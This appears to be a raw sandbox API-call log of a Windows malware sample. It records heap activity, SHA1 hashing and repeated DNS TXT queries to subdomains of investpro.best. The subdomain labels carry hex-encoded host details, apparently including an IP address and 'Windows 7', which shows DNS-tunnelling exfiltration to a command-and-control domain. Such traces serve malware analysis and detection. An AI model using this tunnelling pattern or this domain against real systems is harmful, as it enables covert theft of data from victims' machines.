ppQueryResults=0x6a7b38*(pNext=0x0, pName="000361455441647a6a7a404030303163356131366337633140403hsb-c8pf60.investpro.best", wType=0x10, wDataLength=0xc, Flags=0x3019, dwTtl=0x0, dwReserved=0x1, Data=0x1816c8*(dwStringCount=0x1, pStringArray="lordlordlordlord")), pReserved=0x0) returned 0x0 [0278.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a6258 [0278.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4660 [0278.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4688 [0278.049] Sleep (dwMilliseconds=0x3e8) [0279.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a6258 | out: hHeap=0x680000) returned 1 [0279.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8620 | out: hHeap=0x680000) returned 1 [0279.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0279.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0279.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696120 [0279.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f) returned 0x6a8620 [0279.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696120 | out: hHeap=0x680000) returned 1 [0279.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aaf78 | out: hHeap=0x680000) returned 1 [0279.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x6aaf78 [0279.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a7b48 [0279.073] DnsQuery_A (in: pszName="0004139322e3136382e302e323131404057696e646f7773203740opf-c8pf60.investpro.best", wType=0x10, Options=0x8, pExtra=0x0, ppQueryResults=0x6a7b48, pReserved=0x0 | out: pExtra=0x0, ppQueryResults=0x6a7b48*(pNext=0x0, pName="0004139322e3136382e302e323131404057696e646f7773203740opf-c8pf60.investpro.best", wType=0x10, wDataLength=0xc, Flags=0x3019, dwTtl=0x0, dwReserved=0x1, Data=0x181ba8*(dwStringCount=0x1, pStringArray="lordlordlordlord")), pReserved=0x0) returned 0x0 [0279.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a6258 [0279.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a46b0 [0279.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a46d8 [0279.279] Sleep (dwMilliseconds=0x3e8) [0280.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a6258 | out: hHeap=0x680000) returned 1 [0280.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aaf78 | out: hHeap=0x680000) returned 1 [0280.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0280.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a6258 [0280.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4700 [0280.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69da78 [0280.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4700 | out: hHeap=0x680000) returned 1 [0280.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8620 | out: hHeap=0x680000) returned 1 [0280.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69d3c8 [0280.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a7b58 [0280.283] DnsQuery_A (in: pszName="000540594b5944363951un7-c8pf60.investpro.best", wType=0x10, Options=0x8, pExtra=0x0, ppQueryResults=0x6a7b58, pReserved=0x0 | out: pExtra=0x0, ppQueryResults=0x6a7b58*(pNext=0x0, pName="000540594b5944363951un7-c8pf60.investpro.best", wType=0x10, wDataLength=0xc, Flags=0x3019, dwTtl=0x0, dwReserved=0x1, Data=0x1815d8*(dwStringCount=0x1, pStringArray="lordlordlordlord")), pReserved=0x0) returned 0x0 [0281.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4700 [0281.128] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4728 [0281.129] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4750 [0281.130] Sleep (dwMilliseconds=0x3e8) [0282.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4700 | out: hHeap=0x680000) returned 1 [0282.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69d3c8 | out: hHeap=0x680000) returned 1 [0282.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a6258 | out: hHeap=0x680000) returned 1 [0282.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0282.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696120 [0282.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f) returned 0x6aaf78 [0282.159] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696120 | out: hHeap=0x680000) returned 1 [0282.159] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69da78 | out: hHeap=0x680000) returned 1 [0282.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x6a8620 [0282.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a7b68 [0282.162] DnsQuery_A (in: pszName="000000000000000000000000000000000000000000000000000s00-c8pf60.investpro.best", wType=0x10, Options=0x8, pExtra=0x0, ppQueryResults=0x6a7b68, pReserved=0x0 | out: pExtra=0x0, ppQueryResults=0x6a7b68*(pNext=0x0, pName="000000000000000000000000000000000000000000000000000s00-c8pf60.investpro.best", wType=0x10, wDataLength=0xc, Flags=0x3019, dwTtl=0x0, dwReserved=0x1, Data=0x1817d8*(dwStringCount=0x1, pStringArray="LTE=")), pReserved=0x0) returned 0x0 [0282.420] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a6258 [0282.420] Sleep (dwMilliseconds=0x3e8) [0283.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8620 | out: hHeap=0x680000) returned 1 [0283.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0283.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4700 [0283.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x400) returned 0x6aa6f0 [0283.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aa6f0 | out: hHeap=0x680000) returned 1 [0283.433] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x300000 [0283.433] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0283.434] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x320000 [0283.435] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2df7ac, pszAlgId="SHA1", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x2df7ac) returned 0x0 [0283.436] BCryptGetProperty (in: hObject=0x69f1b8, pszProperty="ObjectLength", pbOutput=0x2df7a4, cbOutput=0x4, pcbResult=0x2df7a0, dwFlags=0x0 | out: pbOutput=0x2df7a4, pcbResult=0x2df7a0) returned 0x0 [0283.436] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0283.436] BCryptGetProperty (in: hObject=0x69f1b8, pszProperty="HashDigestLength", pbOutput=0x2df7dc, cbOutput=0x4, pcbResult=0x2df7a0, dwFlags=0x0 | out: pbOutput=0x2df7dc, pcbResult=0x2df7a0) returned 0x0 [0283.436] BCryptCreateHash (in: hAlgorithm=0x69f1b8, phHash=0x2df7a8, pbHashObject=0x340000, cbHashObject=0xa6, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x69f1b8, phHash=0x2df7a8, pbHashObject=0x340000) returned 0x0 [0283.436] BCryptHashData (in: hHash=0x340000, pbInput=0x310000, cbInput=0x1, dwFlags=0x0 | out: hHash=0x340000) returned 0x0 [0283.436] BCryptFinishHash (in: hHash=0x340000, pbOutput=0x300000, cbOutput=0x14, dwFlags=0x0 | out: hHash=0x340000, pbOutput=0x300000) returned 0x0 [0283.436] BCryptDestroyHash (in: hHash=0x340000 | out: hHash=0x340000) returned 0x0 [0283.436] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.436] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x69f1b8, dwFlags=0x0 | out: hAlgorithm=0x69f1b8) returned 0x0 [0283.436] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0283.437] wsprintfW (in: param_1=0x340000, param_2="%2.2X" | out: param_1="3B") returned 2 [0283.437] wsprintfW (in: param_1=0x340004, param_2="%2.2X" | out: param_1="C1") returned 2 [0283.437] wsprintfW (in: param_1=0x340008, param_2="%2.2X" | out: param_1="5C") returned 2 [0283.437] wsprintfW (in: param_1=0x34000c, param_2="%2.2X" | out: param_1="8A") returned 2 [0283.437] wsprintfW (in: param_1=0x340010, param_2="%2.2X" | out: param_1="AE") returned 2 [0283.437] wsprintfW (in: param_1=0x340014, param_2="%2.2X" | out: param_1="3E") returned 2 [0283.437] wsprintfW (in: param_1=0x340018, param_2="%2.2X" | out: param_1="41") returned 2 [0283.437] wsprintfW (in: param_1=0x34001c, param_2="%2.2X" | out: param_1="24") returned 2 [0283.437] wsprintfW (in: param_1=0x340020, param_2="%2.2X" | out: param_1="DD") returned 2 [0283.437] wsprintfW (in: param_1=0x340024, param_2="%2.2X" | out: param_1="40") returned 2 [0283.437] wsprintfW (in: param_1=0x340028, param_2="%2.2X" | out: param_1="90") returned 2 [0283.437] wsprintfW (in: param_1=0x34002c, param_2="%2.2X" | out: param_1="35") returned 2 [0283.437] wsprintfW (in: param_1=0x340030, param_2="%2.2X" | out: param_1="F3") returned 2 [0283.437] wsprintfW (in: param_1=0x340034, param_2="%2.2X" | out: param_1="2E") returned 2 [0283.437] wsprintfW (in: param_1=0x340038, param_2="%2.2X" | out: param_1="A2") returned 2 [0283.437] wsprintfW (in: param_1=0x34003c, param_2="%2.2X" | out: param_1="FD") returned 2 [0283.437] wsprintfW (in: param_1=0x340040, param_2="%2.2X" | out: param_1="68") returned 2 [0283.437] wsprintfW (in: param_1=0x340044, param_2="%2.2X" | out: param_1="35") returned 2 [0283.438] wsprintfW (in: param_1=0x340048, param_2="%2.2X" | out: param_1="EF") returned 2 [0283.438] wsprintfW (in: param_1=0x34004c, param_2="%2.2X" | out: param_1="C9") returned 2 [0283.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x6a8620 [0283.438] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x350000 [0283.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3BC15C8AAE3E4124DD409035F32EA2FD6835EFC9", cchWideChar=40, lpMultiByteStr=0x350000, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3BC15C8AAE3E4124DD409035F32EA2FD6835EFC9", lpUsedDefaultChar=0x0) returned 40 [0283.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69da78 [0283.438] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8620 | out: hHeap=0x680000) returned 1 [0283.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69d3c8 [0283.438] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x47) returned 0x6a2940 [0283.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69d3c8 | out: hHeap=0x680000) returned 1 [0283.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a81d0 | out: hHeap=0x680000) returned 1 [0283.439] VirtualFree (lpAddress=0x300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.439] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.439] VirtualFree (lpAddress=0x320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69da78 | out: hHeap=0x680000) returned 1 [0283.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f70 | out: hHeap=0x680000) returned 1 [0283.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695fb8 | out: hHeap=0x680000) returned 1 [0283.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5c40 | out: hHeap=0x680000) returned 1 [0283.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696168 | out: hHeap=0x680000) returned 1 [0283.439] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5c68 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6961b0 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5cb8 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6961f8 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5ce0 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696240 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d08 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696288 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d30 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d80 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5d58 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6962d0 | out: hHeap=0x680000) returned 1 [0283.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5da8 | out: hHeap=0x680000) returned 1 [0283.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x6a84b0 [0283.440] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6a84b0, cbMultiByte=204, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 204 [0283.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a0) returned 0x69f1b8 [0283.440] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6a84b0, cbMultiByte=204, lpWideCharStr=0x69f1b8, cchWideChar=204 | out: lpWideCharStr="{-1}dohxkngufqijikecvrrsi3jwxpkxyksk2lo6ja3diqrvc7adpbsmiprkumbbajr6dn0x56d81nexcncka2at2cm04usjj62w3owqco3eaf7xg7vkx92xf1guo1aajoe7gaw7evnugcg3uwwl34sg82xs6keqh7gdha6lp3e4r1g25onm6goilltpve5aax15s1d1uthv") returned 204 [0283.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1a0) returned 0x6aa6f0 [0283.440] VirtualAlloc (lpAddress=0x0, dwSize=0x19a, flAllocationType=0x3000, flProtect=0x4) returned 0x300000 [0283.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="{-1}dohxkngufqijikecvrrsi3jwxpkxyksk2lo6ja3diqrvc7adpbsmiprkumbbajr6dn0x56d81nexcncka2at2cm04usjj62w3owqco3eaf7xg7vkx92xf1guo1aajoe7gaw7evnugcg3uwwl34sg82xs6keqh7gdha6lp3e4r1g25onm6goilltpve5aax15s1d1uthv", cchWideChar=204, lpMultiByteStr=0x300000, cbMultiByte=410, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{-1}dohxkngufqijikecvrrsi3jwxpkxyksk2lo6ja3diqrvc7adpbsmiprkumbbajr6dn0x56d81nexcncka2at2cm04usjj62w3owqco3eaf7xg7vkx92xf1guo1aajoe7gaw7evnugcg3uwwl34sg82xs6keqh7gdha6lp3e4r1g25onm6goilltpve5aax15s1d1uthv", lpUsedDefaultChar=0x0) returned 204 [0283.443] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x6aa898 [0283.443] VirtualFree (lpAddress=0x300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0283.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aa6f0 | out: hHeap=0x680000) returned 1 [0283.445] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7b78 [0283.445] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7b08 [0283.445] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5da8 [0283.445] GetLastError () returned 0x0 [0283.445] SetLastError (dwErrCode=0x0) [0283.445] GetLastError () returned 0x0 [0283.446] SetLastError (dwErrCode=0x0) [0283.446] GetLastError () returned 0x0 [0283.446] SetLastError (dwErrCode=0x0) [0283.446] GetLastError () returned 0x0 [0283.446] SetLastError (dwErrCode=0x0) [0283.447] GetLastError () returned 0x0 [0283.447] SetLastError (dwErrCode=0x0) [0283.447] GetLastError () returned 0x0 [0283.447] SetLastError (dwErrCode=0x0) [0283.447] GetLastError () returned 0x0 [0283.447] SetLastError (dwErrCode=0x0) [0283.448] GetLastError () returned 0x0 [0283.448] SetLastError (dwErrCode=0x0) [0283.448] GetLastError () returned 0x0 [0283.448] SetLastError (dwErrCode=0x0) [0283.448] GetLastError () returned 0x0 [0283.448] SetLastError (dwErrCode=0x0) [0283.448] GetLastError () returned 0x0 [0283.448] SetLastError (dwErrCode=0x0) [0283.449] GetLastError () returned 0x0 [0283.449] SetLastError (dwErrCode=0x0) [0283.449] GetLastError () returned 0x0 [0283.449] SetLastError (dwErrCode=0x0) [0283.449] GetLastError () returned 0x0 [0283.449] SetLastError (dwErrCode=0x0) [0283.449] GetLastError () returned 0x0 [0283.449] SetLastError (dwErrCode=0x0) [0283.450] GetLastError () returned 0x0 [0283.450] SetLastError (dwErrCode=0x0) [0283.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6962d0 [0283.450] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5da8 | out: hHeap=0x680000) returned 1 [0283.450] GetLastError () returned 0x0 [0283.450] SetLastError (dwErrCode=0x0) [0283.450] GetLastError () returned 0x0 [0283.450] SetLastError (dwErrCode=0x0) [0283.450] GetLastError () returned 0x0 [0283.451] SetLastError (dwErrCode=0x0) [0283.451] GetLastError () returned 0x0 [0283.451] SetLastError (dwErrCode=0x0) [0283.451] GetLastError () returned 0x0 [0283.451] SetLastError (dwErrCode=0x0) [0283.451] GetLastError () returned 0x0 [0283.451] SetLastError (dwErrCode=0x0) [0283.452] GetLastError () returned 0x0 [0283.452] SetLastError (dwErrCode=0x0) [0283.452] GetLastError () returned 0x0 [0283.452] SetLastError (dwErrCode=0x0) [0283.452] GetLastError () returned 0x0 [0283.452] SetLastError (dwErrCode=0x0) [0283.452] GetLastError () returned 0x0 [0283.452] SetLastError (dwErrCode=0x0) [0283.453] GetLastError () returned 0x0 [0283.453] SetLastError (dwErrCode=0x0) [0283.453] GetLastError () returned 0x0 [0283.453] SetLastError (dwErrCode=0x0) [0283.453] GetLastError () returned 0x0 [0283.453] SetLastError (dwErrCode=0x0) [0283.453] GetLastError () returned 0x0 [0283.453] SetLastError (dwErrCode=0x0) [0283.454] GetLastError () returned 0x0 [0283.454] SetLastError (dwErrCode=0x0) [0283.454] GetLastError () returned 0x0 [0283.454] SetLastError (dwErrCode=0x0) [0283.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x6a8620 [0283.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6962d0 | out: hHeap=0x680000) returned 1 [0283.454] GetLastError () returned 0x0 [0283.454] SetLastError (dwErrCode=0x0) [0283.454] GetLastError () returned 0x0 [0283.454] SetLastError (dwErrCode=0x0) [0283.455] GetLastError () returned 0x0 [0283.455] SetLastError (dwErrCode=0x0) [0283.455] GetLastError () returned 0x0 [0283.455] SetLastError (dwErrCode=0x0) [0283.455] GetLastError () returned 0x0 [0283.455] SetLastError (dwErrCode=0x0) [0283.456] GetLastError () returned 0x0 [0283.456] SetLastError (dwErrCode=0x0) [0283.456] GetLastError () returned 0x0 [0283.456] SetLastError (dwErrCode=0x0) [0283.456] GetLastError () returned 0x0 [0283.456] SetLastError (dwErrCode=0x0) [0283.456] GetLastError () returned 0x0 [0283.456] SetLastError (dwErrCode=0x0) [0283.457] GetLastError () returned 0x0 [0283.457] SetLastError (dwErrCode=0x0) [0283.457] GetLastError () returned 0x0 [0283.457] SetLastError (dwErrCode=0x0) [0283.457] GetLastError () returned 0x0 [0283.457] SetLastError (dwErrCode=0x0) [0283.457] GetLastError () returned 0x0 [0283.457] SetLastError (dwErrCode=0x0) [0283.458] GetLastError () returned 0x0 [0283.458] SetLastError (dwErrCode=0x0) [0283.458] GetLastError () returned 0x0 [0283.458] SetLastError (dwErrCode=0x0) [0283.458] GetLastError () returned 0x0 [0283.458] SetLastError (dwErrCode=0x0) [0283.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x69f360 [0283.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8620 | out: hHeap=0x680000) returned 1 [0283.458] GetLastError () returned 0x0 [0283.459] SetLastError (dwErrCode=0x0) [0283.459] GetLastError () returned 0x0 [0283.459] SetLastError (dwErrCode=0x0) [0283.459] GetLastError () returned 0x0 [0283.459] SetLastError (dwErrCode=0x0) [0283.459] GetLastError () returned 0x0 [0283.459] SetLastError (dwErrCode=0x0) [0283.460] GetLastError () returned 0x0 [0283.460] SetLastError (dwErrCode=0x0) [0283.460] GetLastError () returned 0x0 [0283.460] SetLastError (dwErrCode=0x0) [0283.460] GetLastError () returned 0x0 [0283.460] SetLastError (dwErrCode=0x0) [0283.460] GetLastError () returned 0x0 [0283.460] SetLastError (dwErrCode=0x0) [0283.461] GetLastError () returned 0x0 [0283.461] SetLastError (dwErrCode=0x0) [0283.461] GetLastError () returned 0x0 [0283.461] SetLastError (dwErrCode=0x0) [0283.461] GetLastError () returned 0x0 [0283.461] SetLastError (dwErrCode=0x0) [0283.461] GetLastError () returned 0x0 [0283.461] SetLastError (dwErrCode=0x0) [0283.462] GetLastError () returned 0x0 [0283.462] SetLastError (dwErrCode=0x0) [0283.462] GetLastError () returned 0x0 [0283.462] SetLastError (dwErrCode=0x0) [0283.462] GetLastError () returned 0x0 [0283.462] SetLastError (dwErrCode=0x0) [0283.462] GetLastError () returned 0x0 [0283.462] SetLastError (dwErrCode=0x0) [0283.463] GetLastError () returned 0x0 [0283.463] SetLastError (dwErrCode=0x0) [0283.463] GetLastError () returned 0x0 [0283.463] SetLastError (dwErrCode=0x0) [0283.463] GetLastError () returned 0x0 [0283.463] SetLastError (dwErrCode=0x0) [0283.464] GetLastError () returned 0x0 [0283.464] SetLastError (dwErrCode=0x0) [0283.464] GetLastError () returned 0x0 [0283.464] SetLastError (dwErrCode=0x0) [0283.464] GetLastError () returned 0x0 [0283.464] SetLastError (dwErrCode=0x0) [0283.465] GetLastError () returned 0x0 [0283.465] SetLastError (dwErrCode=0x0) [0283.465] GetLastError () returned 0x0 [0283.465] SetLastError (dwErrCode=0x0) [0283.465] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd8) returned 0x6aa6f0 [0283.465] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69f360 | out: hHeap=0x680000) returned 1 [0283.465] GetLastError () returned 0x0 [0283.465] SetLastError (dwErrCode=0x0) [0283.466] GetLastError () returned 0x0 [0283.466] SetLastError (dwErrCode=0x0) [0283.466] GetLastError () returned 0x0 [0283.466] SetLastError (dwErrCode=0x0) [0283.466] GetLastError () returned 0x0 [0283.466] SetLastError (dwErrCode=0x0) [0283.466] GetLastError () returned 0x0 [0283.466] SetLastError (dwErrCode=0x0) [0283.467] GetLastError () returned 0x0 [0283.467] SetLastError (dwErrCode=0x0) [0283.467] GetLastError () returned 0x0 [0283.467] SetLastError (dwErrCode=0x0) [0283.467] GetLastError () returned 0x0 [0283.467] SetLastError (dwErrCode=0x0) [0283.467] GetLastError () returned 0x0 [0283.468] SetLastError (dwErrCode=0x0) [0283.468] GetLastError () returned 0x0 [0283.468] SetLastError (dwErrCode=0x0) [0283.471] GetLastError () returned 0x0 [0283.472] SetLastError (dwErrCode=0x0) [0283.473] GetLastError () returned 0x0 [0283.473] SetLastError (dwErrCode=0x0) [0283.474] GetLastError () returned 0x0 [0283.474] SetLastError (dwErrCode=0x0) [0283.475] GetLastError () returned 0x0 [0283.475] SetLastError (dwErrCode=0x0) [0283.476] GetLastError () returned 0x0 [0283.476] SetLastError (dwErrCode=0x0) [0283.477] GetLastError () returned 0x0 [0283.477] SetLastError (dwErrCode=0x0) [0283.477] GetLastError () returned 0x0 [0283.477] SetLastError (dwErrCode=0x0) [0283.478] GetLastError () returned 0x0 [0283.478] SetLastError (dwErrCode=0x0) [0283.479] GetLastError () returned 0x0 [0283.479] SetLastError (dwErrCode=0x0) [0283.480] GetLastError () returned 0x0 [0283.480] SetLastError (dwErrCode=0x0) [0283.480] GetLastError () returned 0x0 [0283.481] SetLastError (dwErrCode=0x0) [0283.481] GetLastError () returned 0x0 [0283.481] SetLastError (dwErrCode=0x0) [0283.482] GetLastError () returned 0x0 [0283.482] SetLastError (dwErrCode=0x0) [0283.482] GetLastError () returned 0x0 [0283.483] SetLastError (dwErrCode=0x0) [0283.483] GetLastError () returned 0x0 [0283.483] SetLastError (dwErrCode=0x0) [0283.484] GetLastError () returned 0x0 [0283.484] SetLastError (dwErrCode=0x0) [0283.485] GetLastError () returned 0x0 [0283.485] SetLastError (dwErrCode=0x0) [0283.485] GetLastError () returned 0x0 [0283.485] SetLastError (dwErrCode=0x0) [0283.486] GetLastError () returned 0x0 [0283.486] SetLastError (dwErrCode=0x0) [0283.487] GetLastError () returned 0x0 [0283.487] SetLastError (dwErrCode=0x0) [0283.487] GetLastError () returned 0x0 [0283.487] SetLastError (dwErrCode=0x0) [0283.488] GetLastError () returned 0x0 [0283.488] SetLastError (dwErrCode=0x0) [0283.488] GetLastError () returned 0x0 [0283.488] SetLastError (dwErrCode=0x0) [0283.489] GetLastError () returned 0x0 [0283.489] SetLastError (dwErrCode=0x0) [0283.490] GetLastError () returned 0x0 [0283.490] SetLastError (dwErrCode=0x0) [0283.490] GetLastError () returned 0x0 [0283.490] SetLastError (dwErrCode=0x0) [0283.491] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x144) returned 0x6aa970 [0283.491] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6aa6f0 | out: hHeap=0x680000) returned 1 [0283.491] GetLastError () returned 0x0 [0283.491] SetLastError (dwErrCode=0x0) [0283.492] GetLastError () returned 0x0 [0283.492] SetLastError (dwErrCode=0x0) [0283.492] GetLastError () returned 0x0 [0283.492] SetLastError (dwErrCode=0x0) [0283.493] GetLastError () returned 0x0 [0283.493] SetLastError (dwErrCode=0x0) [0283.494] GetLastError () returned 0x0 [0283.494] SetLastError (dwErrCode=0x0) [0283.494] GetLastError () returned 0x0 [0283.494] SetLastError (dwErrCode=0x0) [0283.495] GetLastError () returned 0x0 [0283.495] SetLastError (dwErrCode=0x0) [0283.496] GetLastError () returned 0x0 [0283.496] SetLastError (dwErrCode=0x0) [0283.496] GetLastError () returned 0x0 [0283.496] SetLastError (dwErrCode=0x0) [0283.497] GetLastError () returned 0x0 [0283.497] SetLastError (dwErrCode=0x0) [0283.497] GetLastError () returned 0x0 [0283.498] SetLastError (dwErrCode=0x0) [0283.498] GetLastError () returned 0x0 [0283.498] SetLastError (dwErrCode=0x0) [0283.499] GetLastError () returned 0x0 [0283.499] SetLastError (dwErrCode=0x0) [0283.499] GetLastError () returned 0x0 [0283.499] 